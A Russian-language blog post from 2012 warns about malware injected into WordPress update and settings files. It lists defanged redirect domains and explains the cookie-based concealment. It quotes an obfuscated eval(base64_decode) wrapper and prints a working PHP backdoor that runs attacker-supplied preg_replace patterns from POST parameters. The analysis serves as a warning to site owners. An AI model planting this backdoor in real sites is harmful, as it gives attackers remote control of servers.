среда, 9 мая 2012 г.

Wordpress - вредоносный апгрейд, осторожно!

[09.05.2012 19:06:50]
Более 1000 блогов на платформе Wordpress уже инфицированы зловредом, который заблаговременно внедрился в скрипт автоматического обновления wp-admin/includes/update.php. Атаку нашел Денис Синегубко из компании Unmask Parasites.

Так как атака началась в районе 20 апреля, перед выходом новой версии Wordpress 3.3.2, к настоящему моменту функцией автоматического обновления воспользовалось большое число админов. Многие из них, так, добавили в свои блоги вредоносный код.




Инфицированные сайты производят редирект по следующим адресам:

hxxp://berega .in/?site=&q=&Searchengine=hxxp://zizigoba .in/?site=&q=&Searchengine=hxxp://vivizaza .be/?site=8&q=&Searchengine=

После пользователей перенаправляют по URL вроде этих:

hxxp://riotorio .com/search/?q=hxxp://lazgosearch .com/search?_t=1&q=http://gabazasearch .com/?_t=1&q=

В результате, злоумышленники производят монетизацию трафика при помощи рекламных программ с оплатой за клики.

Атака проведена путём введения в файл wp-settings.php дополнительного кода (см. расшифровку):

// For an advanced caching plugin to use. Uses a static drop-in because you would only want one.// Start cache settingseval(base64_decode('...long unreadable string here...'));// Finish cache settings// Start cache settings// Finish cache settings

В коде есть несколько интересных особенностей. К примеру, он устанавливает cookie и перенаправляет пользователей лишь в том случае, если cookie отсутствует. Помимо того, он отправляет IP-адрес пользователя на удалённый сервер, чтоб блокировать редирект для этого IP в будущем. Всё это сделано для скрытия атаки путём затруднения её повторения.

Есть фрагмент, который выполняет функцию бэкдора, так что злоумышленники могут потом модифицировать код на каждом заражённом сервере.

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) {$c = $_POST['cadv'];$c = str_replace("\\\\", "\\", $c);$g = $_POST['gadv'];$g = str_replace("\\\"", "\"", $g);$r = preg_replace("$c", $g, 'sss 4');die();}

За исключением wp-settings.php, модификации подвергается функция wp_update_core в файле wp-admin/includes/update.php. Расшифрованный код см. тут. Именно она отвечает за осуществление автоматического обновления Wordpress.

Комментариев нет:

Отправить комментарий